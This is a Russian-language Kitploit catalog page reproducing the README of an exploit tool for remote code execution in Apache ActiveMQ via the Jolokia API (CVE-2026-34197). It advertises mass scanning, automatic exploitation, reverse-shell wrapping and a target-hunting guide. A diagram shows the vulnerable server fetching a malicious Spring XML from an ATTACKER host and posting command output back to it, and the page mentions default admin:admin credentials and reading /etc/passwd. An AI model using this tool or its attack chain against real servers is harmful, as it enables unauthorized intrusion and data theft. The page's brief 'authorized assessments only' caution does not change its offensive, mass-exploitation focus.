Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-34197 — Эксплойт для Apache ActiveMQ RCE через Jolokia API (CVE-2026-34197) с захватом вывода команд, массовым сканированием и автоматической эксплуатацией. | Kitploit
Инструменты/GitHubGitHub/kondordevsecuritycorp/cve-2026-34197
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingЛаборатории и Практика
GitHub
kondordevsecuritycorp/cve-2026-34197

CVE-2026-34197

Эксплойт для Apache ActiveMQ RCE через Jolokia API (CVE-2026-34197) с захватом вывода команд, массовым сканированием и автоматической эксплуатацией.

Репозиторий
21155 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-34197 CVSS 9.8 RCE Python 3.8+

Apache ActiveMQ Jolokia Spring

CVE-2026-34197

Удалённое выполнение кода в Apache ActiveMQ через Jolokia API

Author Stars Forks Issues License

Обзор • Детали • Вектор атаки • Быстрый старт • Руководство по ATTACKER_IP • Использование • Захват вывода • Сканер • Поиск • Обнаружение • Устранение


Обзор

CVE-2026-34197 — это критическая уязвимость удалённого выполнения кода (RCE) в Apache ActiveMQ Classic, которая позволяет аутентифицированному злоумышленнику выполнять произвольные команды операционной системы через Jolokia API, доступный в веб-консоли.

Уязвимость существует уже более 13 лет и кроется во взаимодействии между Jolokia (HTTP-JMX мост), MBeans ActiveMQ, сетевыми коннекторами и VM-транспортом.

[!CAUTION] Это первый публичный PoC, разработанный KONDOR DEV SECURITY. Используйте только в авторизованных оценках безопасности.

Ключевые возможности

  • Захват вывода команд — простые команды (id, whoami, cat /etc/passwd) автоматически отображают свой вывод в вашем терминале
  • Автоматическая base64-обёртка — reverse shell и специальные символы работают без ручного экранирования
  • Двухфазный сканер (version_check.py) — многопоточное определение версии + целевая эксплуатация
  • Резервная аутентификация — автоматически пробует режим без аутентификации, если учётные данные не подходят (CVE-2024-32114)
  • Умное определение брокера — автоматически определяет имя брокера через wildcard-запросы Jolokia

Детали уязвимости

ID CVECVE-2026-34197
Серьёзность CVSS 3.1
ТипУдалённое выполнение кода (RCE)
CWECWE-20 (Некорректная проверка входных данных) / CWE-94 (Внедрение кода)
Затронутые версииActiveMQ Classic < 5.19.4 и 6.0.0 — 6.2.2
Исправлено в5.19.4 / 6.2.3
Требуется аутентификацияДа (часто используются учётные данные по умолчанию admin:admin)
Без аутентификации6.0.0 — 6.1.1 (из-за CVE-2024-32114)
Порт по умолчанию8161 (веб-консоль)

Вектор атаки```

                CVE-2026-34197 — Exploitation Chain

──────────────────────────────────────────────────────────────

ATTACKER ACTIVEMQ SERVER ──────── ─────────────── │ │ [1] │── POST /api/jolokia/ ──────────────────>│ │ addNetworkConnector( │ │ vm://rce?brokerConfig= │ │ xbean:http://ATTACKER/payload.xml) │ │ │ │ [2] │── Creates VM broker │ │── Fetches remote XML │ │ [3] │<── GET /payload.xml ─────────────────────│ │── Serves malicious Spring XML ─────────>│ │ │ │ [4] │── Spring instantiates beans │ │── Runtime.exec(COMMAND) │ │── ** RCE ACHIEVED ** │ │ [5] │<── POST /output (command stdout) ────────│ (auto, for simple commands) │── Displays command output │ │ │

### Пошаговый разбор

| Шаг | Действие | Компонент |
|:----:|--------|-----------|
| **1** | Атакующий отправляет POST-запрос на `/api/jolokia/`, вызывая `addNetworkConnector` на MBean-объекте Broker | Jolokia API |
| **2** | ActiveMQ обрабатывает URI транспорта `vm://` и создаёт временный брокер с `brokerConfig`, указывающим на удалённый URL | VM Transport |
| **3** | Схема `xbean:` инициирует загрузку Spring XML-файла конфигурации с сервера атакующего | Spring / XBean |
| **4** | Spring создаёт все бины из XML, включая тот, который вызывает `Runtime.getRuntime().exec()` | Spring Context |
| **5** | Для простых команд вывод перехватывается и отправляется обратно через HTTP POST на прослушивающий сервер атакующего (автоматически) | Output Capture |

---

## Структура проекта```
CVE-2026-34197/
├── exploit.py             # PoC exploit (single target + mass scan)
├── version_check.py       # Scanner + Auto-Exploit (2-phase pipeline)
├── payloads/
│   └── template.xml       # Spring XML payload template
├── targets.txt            # Target URLs (one per line)
├── docker/
│   └── docker-compose.yml # Vulnerable lab environment
├── docs/
│   ├── HUNTING_GUIDE_EN.md  # Target hunting guide (English)
│   └── HUNTING_GUIDE_ES.md  # Guía de búsqueda (Español)
├── LICENSE
└── README.md

Быстрый старт

Скачать инструмент